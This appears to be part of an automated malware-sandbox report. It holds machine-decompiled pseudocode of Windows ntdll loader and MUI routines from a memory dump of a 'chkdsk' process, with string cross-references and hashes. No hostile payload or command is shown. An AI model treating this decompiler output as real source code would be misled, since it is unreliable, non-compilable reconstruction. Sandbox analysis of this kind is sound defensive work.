                                                      								_t281 = E04DD1370(_t282, 0x4d64e90);
                                                      								_pop(_t262);
                                                      							} while (_t281 != 0);
                                                      							_v48 = _t244;
                                                      							_t242 = _v52;
                                                      						}
                                                      						_t201 = _v48;
                                                      						_t280 = 0;
                                                      						if( *_v48 != 0) {
                                                      							E04DCBB40(_t262,  &_v68, _t201);
                                                      							if(L04D943C0( &_v68,  &_v24) != 0) {
                                                      								_t279 =  &(_t279[0]);
                                                      							}
                                                      						}
                                                      						if(_t279 == 0) {
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                      							_v28 = _t280;
                                                      							_v16 = _t280;
                                                      						}
                                                      						_t202 = _v8;
                                                      						if(_v8 != 0) {
                                                      							L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                      						}
                                                      						_v8 = _t280;
                                                      						goto L28;
                                                      					}
                                                      				}
                                                      				_t214 = _v12;
                                                      				_t264 = _v12 + 4;
                                                      				_v40 = _t264;
                                                      				if(_t264 == 0) {
                                                      					_v20 = _t280;
                                                      				} else {
                                                      					_t236 = L04DA4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                      					_t280 = _t236;
                                                      					_v20 = _t236;
                                                      					_t214 = _v12;
                                                      				}
                                                      				if(_t280 == 0) {
                                                      					_t161 = 0;
                                                      					_t280 = 0xc0000017;
                                                      					_v40 = 0;
                                                      					goto L48;
                                                      				} else {
                                                      					E04DCF3E0(_t280, _v8, _t214);
                                                      					_t285 = _t285 + 0xc;
                                                      					_v48 = _t280;
                                                      					_t283 = E04DD1370(_t280, 0x4d64e90);
                                                      					_pop(_t267);
                                                      					if(_t283 != 0) {
                                                      						_t245 = _v48;
                                                      						do {
                                                      							 *_t283 = 0;
                                                      							_t284 = _t283 + 2;
                                                      							E04DCBB40(_t267,  &_v68, _t245);
                                                      							if(L04D943C0( &_v68,  &_v24) != 0) {
                                                      								_t275 = _t275 + 1;
                                                      							}
                                                      							_t245 = _t284;
                                                      							_t283 = E04DD1370(_t284, 0x4d64e90);
                                                      							_pop(_t267);
                                                      						} while (_t283 != 0);
                                                      						_v48 = _t245;
                                                      						_t242 = _v52;
                                                      					}
                                                      					_t224 = _v48;
                                                      					_t280 = 0;
                                                      					if( *_v48 != 0) {
                                                      						E04DCBB40(_t267,  &_v68, _t224);
                                                      						if(L04D943C0( &_v68,  &_v24) != 0) {
                                                      							_t275 = _t275 + 1;
                                                      						}
                                                      					}
                                                      					if(_t275 == 0) {
                                                      						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                      						_v40 = _t280;
                                                      						_v20 = _t280;
                                                      					}
                                                      					_t225 = _v8;
                                                      					if(_v8 != 0) {
                                                      						L04DA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                      					}
                                                      					_v8 = _t280;
                                                      					goto L16;
                                                      				}
                                                      			}











































                                                      Strings
                                                      • Kernel-MUI-Language-Disallowed, xrefs: 04D93E97
                                                      • Kernel-MUI-Language-SKU, xrefs: 04D93F70
                                                      • Kernel-MUI-Number-Allowed, xrefs: 04D93D8C
                                                      • WindowsExcludedProcs, xrefs: 04D93D6F
                                                      • Kernel-MUI-Language-Allowed, xrefs: 04D93DC0
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                      • API String ID: 0-258546922
                                                      • Opcode ID: 02270c130f705fc3f50499a85e858fb5ec1cee30779fe5bfaf646ea553ceb751
                                                      • Instruction ID: 584e1dccdc2d79e52bf4f1e0d4a4de65f0dbe00f168c1892ee5365459e547bd8
                                                      • Opcode Fuzzy Hash: 02270c130f705fc3f50499a85e858fb5ec1cee30779fe5bfaf646ea553ceb751
                                                      • Instruction Fuzzy Hash: 22F12B72E00619EBDF11EF99C980AEEB7F9FF08654F14415AE905E7211E734AE01DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 44%
                                                      			E04DB8E00(void* __ecx) {
                                                      				signed int _v8;
                                                      				char _v12;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr* _t32;
                                                      				intOrPtr _t35;
                                                      				intOrPtr _t43;
                                                      				void* _t46;
                                                      				intOrPtr _t47;
                                                      				void* _t48;
                                                      				signed int _t49;
                                                      				void* _t50;
                                                      				intOrPtr* _t51;
                                                      				signed int _t52;
                                                      				void* _t53;
                                                      				intOrPtr _t55;
                                                      
                                                      				_v8 =  *0x4e7d360 ^ _t52;
                                                      				_t49 = 0;
                                                      				_t48 = __ecx;
                                                      				_t55 =  *0x4e78464; // 0x74e10110
                                                      				if(_t55 == 0) {
                                                      					L9:
                                                      					if( !_t49 >= 0) {
                                                      						if(( *0x4e75780 & 0x00000003) != 0) {
                                                      							E04E05510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                      						}
                                                      						if(( *0x4e75780 & 0x00000010) != 0) {
                                                      							asm("int3");
                                                      						}
                                                      					}
                                                      					return E04DCB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                      				}
                                                      				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                      				_t43 =  *0x4e77984; // 0x302ac8
                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                      					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                      					if(_t48 == _t43) {
                                                      						_t50 = 0x5c;
                                                      						if( *_t32 == _t50) {
                                                      							_t46 = 0x3f;
                                                      							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                      								_t32 = _t32 + 8;
                                                      							}
                                                      						}
                                                      					}
                                                      					_t51 =  *0x4e78464; // 0x74e10110
                                                      					 *0x4e7b1e0(_t47, _t32,  &_v12);
                                                      					_t49 =  *_t51();
                                                      					if(_t49 >= 0) {
                                                      						L8:
                                                      						_t35 = _v12;
                                                      						if(_t35 != 0) {
                                                      							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                      								E04DB9B10( *((intOrPtr*)(_t48 + 0x48)));
                                                      								_t35 = _v12;
                                                      							}
                                                      							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                      						}
                                                      						goto L9;
                                                      					}
                                                      					if(_t49 != 0xc000008a) {
                                                      						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                      							if(_t49 != 0xc00000bb) {
                                                      								goto L8;
                                                      							}
                                                      						}
                                                      					}
                                                      					if(( *0x4e75780 & 0x00000005) != 0) {
                                                      						_push(_t49);
                                                      						E04E05510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                      						_t53 = _t53 + 0x1c;
                                                      					}
                                                      					_t49 = 0;
                                                      					goto L8;
                                                      				} else {
                                                      					goto L9;
                                                      				}
                                                      			}





















                                                      Strings
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 04DF933B, 04DF9367
                                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 04DF9357
                                                      • LdrpFindDllActivationContext, xrefs: 04DF9331, 04DF935D
                                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 04DF932A
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-3779518884
                                                      • Opcode ID: 3469b2516bef4ee96a934c184bfa229fefab43bf41ab556cc0e71cbff61d63e8
                                                      • Instruction ID: 5842557cba6a5a466d4c24c35e315daee49715a0713903fe3f773ecba6bf3d72
                                                      • Opcode Fuzzy Hash: 3469b2516bef4ee96a934c184bfa229fefab43bf41ab556cc0e71cbff61d63e8
                                                      • Instruction Fuzzy Hash: 5441B222E00315EFDB35BB188C89BB9B3A9BB00755F0A4169F98757190E762FD80A7C1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 83%
                                                      			E04D98794(void* __ecx) {
                                                      				signed int _v0;
                                                      				char _v8;
                                                      				signed int _v12;
                                                      				void* _v16;
                                                      				signed int _v20;
                                                      				intOrPtr _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				signed int _v40;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				void* __ebp;
                                                      				intOrPtr* _t77;
                                                      				signed int _t80;
                                                      				signed char _t81;
                                                      				signed int _t87;
                                                      				signed int _t91;
                                                      				void* _t92;
                                                      				void* _t94;
                                                      				signed int _t95;
                                                      				signed int _t103;
                                                      				signed int _t105;
                                                      				signed int _t110;
                                                      				signed int _t118;
                                                      				intOrPtr* _t121;
                                                      				intOrPtr _t122;
                                                      				signed int _t125;
                                                      				signed int _t129;
                                                      				signed int _t131;
                                                      				signed int _t134;
                                                      				signed int _t136;
                                                      				signed int _t143;
                                                      				signed int* _t147;
                                                      				signed int _t151;
                                                      				void* _t153;
                                                      				signed int* _t157;
                                                      				signed int _t159;
                                                      				signed int _t161;
                                                      				signed int _t166;
                                                      				signed int _t168;
                                                      
                                                      				_push(__ecx);
                                                      				_t153 = __ecx;
                                                      				_t159 = 0;
                                                      				_t121 = __ecx + 0x3c;
                                                      				if( *_t121 == 0) {
                                                      					L2:
                                                      					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                      					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                      						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                      						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                      						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                      							L6:
                                                      							if(E04D9934A() != 0) {
                                                      								_t159 = E04E0A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                      								__eflags = _t159;
                                                      								if(_t159 < 0) {
                                                      									_t81 =  *0x4e75780; // 0x0
                                                      									__eflags = _t81 & 0x00000003;
                                                      									if((_t81 & 0x00000003) != 0) {
                                                      										_push(_t159);
                                                      										E04E05510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                      										_t81 =  *0x4e75780; // 0x0
                                                      									}
                                                      									__eflags = _t81 & 0x00000010;
                                                      									if((_t81 & 0x00000010) != 0) {
                                                      										asm("int3");
                                                      									}
                                                      								}
                                                      							}
                                                      						} else {
                                                      							_t159 = E04D9849B(0, _t122, _t153, _t159, _t180);
                                                      							if(_t159 >= 0) {
                                                      								goto L6;
                                                      							}
                                                      						}
                                                      						_t80 = _t159;
                                                      						goto L8;
                                                      					} else {
                                                      						_t125 = 0x13;
                                                      						asm("int 0x29");
                                                      						_push(0);
                                                      						_push(_t159);
                                                      						_t161 = _t125;
                                                      						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                      						_t143 = 0;
                                                      						_v40 = _t161;
                                                      						_t118 = 0;
                                                      						_push(_t153);
                                                      						__eflags = _t87;
                                                      						if(_t87 != 0) {
                                                      							_t118 = _t87 + 0x5d8;
                                                      							__eflags = _t118;
                                                      							if(_t118 == 0) {
                                                      								L46:
                                                      								_t118 = 0;
                                                      							} else {
                                                      								__eflags =  *(_t118 + 0x30);
                                                      								if( *(_t118 + 0x30) == 0) {
                                                      									goto L46;
                                                      								}
                                                      							}
                                                      						}
                                                      						_v32 = 0;
                                                      						_v28 = 0;
                                                      						_v16 = 0;
                                                      						_v20 = 0;
                                                      						_v12 = 0;
                                                      						__eflags = _t118;
                                                      						if(_t118 != 0) {
                                                      							__eflags = _t161;
                                                      							if(_t161 != 0) {
                                                      								__eflags =  *(_t118 + 8);
                                                      								if( *(_t118 + 8) == 0) {
                                                      									L22:
                                                      									_t143 = 1;
                                                      									__eflags = 1;
                                                      								} else {
                                                      									_t19 = _t118 + 0x40; // 0x40
                                                      									_t156 = _t19;
                                                      									E04D98999(_t19,  &_v16);
                                                      									__eflags = _v0;
                                                      									if(_v0 != 0) {
                                                      										__eflags = _v0 - 1;
                                                      										if(_v0 != 1) {
                                                      											goto L22;
                                                      										} else {
                                                      											_t128 =  *(_t161 + 0x64);
                                                      											__eflags =  *(_t161 + 0x64);
                                                      											if( *(_t161 + 0x64) == 0) {
                                                      												goto L22;
                                                      											} else {
                                                      												E04D98999(_t128,  &_v12);
                                                      												_t147 = _v12;
                                                      												_t91 = 0;
                                                      												__eflags = 0;
                                                      												_t129 =  *_t147;
                                                      												while(1) {
                                                      													__eflags =  *((intOrPtr*)(0x4e75c60 + _t91 * 8)) - _t129;
                                                      													if( *((intOrPtr*)(0x4e75c60 + _t91 * 8)) == _t129) {
                                                      														break;
                                                      													}
                                                      													_t91 = _t91 + 1;
                                                      													__eflags = _t91 - 5;
                                                      													if(_t91 < 5) {
                                                      														continue;
                                                      													} else {
                                                      														_t131 = 0;
                                                      														__eflags = 0;
                                                      													}
                                                      													L37:
                                                      													__eflags = _t131;
                                                      													if(_t131 != 0) {
                                                      														goto L22;
                                                      													} else {
                                                      														__eflags = _v16 - _t147;
                                                      														if(_v16 != _t147) {
                                                      															goto L22;
                                                      														} else {
                                                      															E04DA2280(_t92, 0x4e786cc);
                                                      															_t94 = E04E59DFB( &_v20);
                                                      															__eflags = _t94 - 1;
                                                      															if(_t94 != 1) {
                                                      															}
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															 *_t118 =  *_t118 + 1;
                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                      															_t95 = E04DB61A0( &_v32);
                                                      															__eflags = _t95;
                                                      															if(_t95 != 0) {
                                                      																__eflags = _v32 | _v28;
                                                      																if((_v32 | _v28) != 0) {
                                                      																	_t71 = _t118 + 0x40; // 0x3f
                                                      																	_t134 = _t71;
                                                      																	goto L55;
                                                      																}
                                                      															}
                                                      															goto L30;
                                                      														}
                                                      													}
                                                      													goto L56;
                                                      												}
                                                      												_t92 = 0x4e75c64 + _t91 * 8;
                                                      												asm("lock xadd [eax], ecx");
                                                      												_t131 = (_t129 | 0xffffffff) - 1;
                                                      												goto L37;
                                                      											}
                                                      										}
                                                      										goto L56;
                                                      									} else {
                                                      										_t143 = E04D98A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
                                                      										__eflags = _t143;
                                                      										if(_t143 != 0) {
                                                      											_t157 = _v12;
                                                      											_t103 = 0;
                                                      											__eflags = 0;
                                                      											_t136 =  &(_t157[1]);
                                                      											 *(_t161 + 0x64) = _t136;
                                                      											_t151 =  *_t157;
                                                      											_v20 = _t136;
                                                      											while(1) {
                                                      												__eflags =  *((intOrPtr*)(0x4e75c60 + _t103 * 8)) - _t151;
                                                      												if( *((intOrPtr*)(0x4e75c60 + _t103 * 8)) == _t151) {
                                                      													break;
                                                      												}
                                                      												_t103 = _t103 + 1;
                                                      												__eflags = _t103 - 5;
                                                      												if(_t103 < 5) {
                                                      													continue;
                                                      												}
                                                      												L21:
                                                      												_t105 = E04DCF380(_t136, 0x4d61184, 0x10);
                                                      												__eflags = _t105;
                                                      												if(_t105 != 0) {
                                                      													__eflags =  *_t157 -  *_v16;
                                                      													if( *_t157 >=  *_v16) {
                                                      														goto L22;
                                                      													} else {
                                                      														asm("cdq");
                                                      														_t166 = _t157[5] & 0x0000ffff;
                                                      														_t108 = _t157[5] & 0x0000ffff;
                                                      														asm("cdq");
                                                      														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                                      														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                                      														if(__eflags > 0) {
                                                      															L29:
                                                      															E04DA2280(_t108, 0x4e786cc);
                                                      															 *_t118 =  *_t118 + 1;
                                                      															_t42 = _t118 + 0x40; // 0x3f
                                                      															_t156 = _t42;
                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															asm("movsd");
                                                      															_t110 = E04DB61A0( &_v32);
                                                      															__eflags = _t110;
                                                      															if(_t110 != 0) {
                                                      																__eflags = _v32 | _v28;
                                                      																if((_v32 | _v28) != 0) {
                                                      																	_t134 = _v20;
                                                      																	L55:
                                                      																	E04E59D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                                      																}
                                                      															}
                                                      															L30:
                                                      															 *_t118 =  *_t118 + 1;
                                                      															asm("adc dword [ebx+0x4], 0x0");
                                                      															E04D9FFB0(_t118, _t156, 0x4e786cc);
                                                      															goto L22;
                                                      														} else {
                                                      															if(__eflags < 0) {
                                                      																goto L22;
                                                      															} else {
                                                      																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                                      																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                                      																	goto L22;
                                                      																} else {
                                                      																	goto L29;
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      													goto L56;
                                                      												}
                                                      												goto L22;
                                                      											}
                                                      											asm("lock inc dword [eax]");
                                                      											goto L21;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						return _t143;
                                                      					}
                                                      				} else {
                                                      					_push( &_v8);
                                                      					_push( *((intOrPtr*)(__ecx + 0x50)));
                                                      					_push(__ecx + 0x40);
                                                      					_push(_t121);
                                                      					_push(0xffffffff);
                                                      					_t80 = E04DC9A00();
                                                      					_t159 = _t80;
                                                      					if(_t159 < 0) {
                                                      						L8:
                                                      						return _t80;
                                                      					} else {
                                                      						goto L2;
                                                      					}
                                                      				}
                                                      				L56:
                                                      			}
                                                      0x04d98884
                                                      0x04d98886
                                                      0x04d98889
                                                      0x04d9888c
                                                      0x04d9888e
                                                      0x04d98891
                                                      0x04d98891
                                                      0x04d98898
                                                      0x00000000
                                                      0x00000000
                                                      0x04d9889a
                                                      0x04d9889b
                                                      0x04d9889e
                                                      0x00000000
                                                      0x00000000
                                                      0x04d988a0
                                                      0x04d988a8
                                                      0x04d988b0
                                                      0x04d988b2
                                                      0x04d988d3
                                                      0x04d988d5
                                                      0x00000000
                                                      0x04d988d7
                                                      0x04d988db
                                                      0x04d988dc
                                                      0x04d988e0
                                                      0x04d988e8
                                                      0x04d988ee
                                                      0x04d988f0
                                                      0x04d988f3
                                                      0x04d988fc
                                                      0x04d98901
                                                      0x04d98906
                                                      0x04d9890c
                                                      0x04d9890c
                                                      0x04d9890f
                                                      0x04d98916
                                                      0x04d98917
                                                      0x04d98918
                                                      0x04d98919
                                                      0x04d9891a
                                                      0x04d9891f
                                                      0x04d98921
                                                      0x04de9c52
                                                      0x04de9c55
                                                      0x04de9c5b
                                                      0x04de9cac
                                                      0x04de9cc0
                                                      0x04de9cc0
                                                      0x04de9c55
                                                      0x04d98927
                                                      0x04d98927
                                                      0x04d9892f
                                                      0x04d98933
                                                      0x00000000
                                                      0x04d988f5
                                                      0x04d988f5
                                                      0x00000000
                                                      0x04d988f7
                                                      0x04d988f7
                                                      0x04d988fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d988fa
                                                      0x04d988f5
                                                      0x04d988f3
                                                      0x00000000
                                                      0x04d988d5
                                                      0x00000000
                                                      0x04d988b2
                                                      0x04d988c9
                                                      0x00000000
                                                      0x04d988c9
                                                      0x04d9887f
                                                      0x04d9886a
                                                      0x04d98857
                                                      0x04d98852
                                                      0x04d988bf
                                                      0x04d988bf
                                                      0x04d987aa
                                                      0x04d987ad
                                                      0x04d987ae
                                                      0x04d987b4
                                                      0x04d987b5
                                                      0x04d987b6
                                                      0x04d987b8
                                                      0x04d987bd
                                                      0x04d987c1
                                                      0x04d987f4
                                                      0x04d987fa
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x04d987c1
                                                      0x00000000

                                                      Strings
                                                      • LdrpDoPostSnapWork, xrefs: 04DE9C1E
                                                      • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04DE9C18
                                                      • minkernel\ntdll\ldrsnap.c, xrefs: 04DE9C28
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                      • API String ID: 0-1948996284
                                                      • Opcode ID: c953ae4e06d01cdb39c470ddd2d59a0510c4fd4f06c2959a8a24603d5ec2bd02
                                                      • Instruction ID: ba36d23645c908bd37a91a29452bdba97e958a139caefbb08a67acea057854eb
                                                      • Opcode Fuzzy Hash: c953ae4e06d01cdb39c470ddd2d59a0510c4fd4f06c2959a8a24603d5ec2bd02
                                                      • Instruction Fuzzy Hash: 6A91C071B10206ABDF18EF5AD480ABAB7F5FF46B54B4440A9E845EB240E730FD41DBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 98%
                                                      			E04D97E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				char _v24;
                                                      				signed int _t73;
                                                      				void* _t77;
                                                      				char* _t82;
                                                      				char* _t87;
                                                      				signed char* _t97;
                                                      				signed char _t102;
                                                      				intOrPtr _t107;
                                                      				signed char* _t108;
                                                      				intOrPtr _t112;
                                                      				intOrPtr _t124;
                                                      				intOrPtr _t125;
                                                      				intOrPtr _t126;
                                                      
                                                      				_t107 = __edx;
                                                      				_v12 = __ecx;
                                                      				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                                      				_t124 = 0;
                                                      				_v20 = __edx;
                                                      				if(E04D9CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                                      					_t112 = _v8;
                                                      				} else {
                                                      					_t112 = 0;
                                                      					_v8 = 0;
                                                      				}
                                                      				if(_t112 != 0) {
                                                      					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                                      						_t124 = 0xc000007b;
                                                      						goto L8;
                                                      					}
                                                      					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                                      					 *(_t125 + 0x34) = _t73;
                                                      					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                                      						goto L3;
                                                      					}
                                                      					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                                      					_t124 = E04D8C9A4( *((intOrPtr*)(_t125 + 0x18)));
                                                      					if(_t124 < 0) {
                                                      						goto L8;
                                                      					} else {
                                                      						goto L3;
                                                      					}
                                                      				} else {
                                                      					L3:
                                                      					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                                      						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                                      						L8:
                                                      						return _t124;
                                                      					}
                                                      					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                                      						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                                      							goto L5;
                                                      						}
                                                      						_t102 =  *0x4e75780; // 0x0
                                                      						if((_t102 & 0x00000003) != 0) {
                                                      							E04E05510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                                      							_t102 =  *0x4e75780; // 0x0
                                                      						}
                                                      						if((_t102 & 0x00000010) != 0) {
                                                      							asm("int3");
                                                      						}
                                                      						_t124 = 0xc0000428;
                                                      						goto L8;
                                                      					}
                                                      					L5:
                                                      					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                                      						goto L8;
                                                      					}
                                                      					_t77 = _a4 - 0x40000003;
                                                      					if(_t77 == 0 || _t77 == 0x33) {
                                                      						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                                      						if(E04DA7D50() != 0) {
                                                      							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      						} else {
                                                      							_t82 = 0x7ffe0384;
                                                      						}
                                                      						_t108 = 0x7ffe0385;
                                                      						if( *_t82 != 0) {
                                                      							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                      								if(E04DA7D50() == 0) {
                                                      									_t97 = 0x7ffe0385;
                                                      								} else {
                                                      									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                      								}
                                                      								if(( *_t97 & 0x00000020) != 0) {
                                                      									E04E07016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                                      								}
                                                      							}
                                                      						}
                                                      						if(_a4 != 0x40000003) {
                                                      							L14:
                                                      							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                      							if(E04DA7D50() != 0) {
                                                      								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                      							} else {
                                                      								_t87 = 0x7ffe0384;
                                                      							}
                                                      							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                                      								if(E04DA7D50() != 0) {
                                                      									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                                      								}
                                                      								if(( *_t108 & 0x00000020) != 0) {
                                                      									E04E07016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                                      								}
                                                      							}
                                                      							goto L8;
                                                      						} else {
                                                      							_v16 = _t125 + 0x24;
                                                      							_t124 = E04DBA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                                      							if(_t124 < 0) {
                                                      								E04D8B1E1(_t124, 0x1490, 0, _v16);
                                                      								goto L8;
                                                      							}
                                                      							goto L14;
                                                      						}
                                                      					} else {
                                                      						goto L8;
                                                      					}
                                                      				}
                                                      			}





















                                                      Strings
                                                      • Could not validate the crypto signature for DLL %wZ, xrefs: 04DE9891
                                                      • minkernel\ntdll\ldrmap.c, xrefs: 04DE98A2
                                                      • LdrpCompleteMapModule, xrefs: 04DE9898
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.567085353.0000000004D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D60000, based on PE: true
                                                      • Associated: 0000000A.00000002.567198234.0000000004E7B000.00000040.00000800.00020000.00000000.sdmp
                                                      • Associated: 0000000A.00000002.567207274.0000000004E7F000.00000040.00000800.00020000.00000000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_10_2_4d60000_chkdsk.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                      • API String ID: 0-1676968949
                                                      • Opcode ID: 9baaba34d52c022210c681e2ddf372bad302f1a7fbdcbd54991d1359e7e04a4a
                                                      • Instruction ID: 76a9c790f77af9920336ba84f064802568feafa5236f7207d322f406efff9c1c
                                                      • Opcode Fuzzy Hash: 9baaba34d52c022210c681e2ddf372bad302f1a7fbdcbd54991d1359e7e04a4a
                                                      • Instruction Fuzzy Hash: 0F51CB71A10746DBEB21DF69C994B6AB7E4FB01314F040699E991DB6E1E770FD00CBA0
                                                      Uniqueness

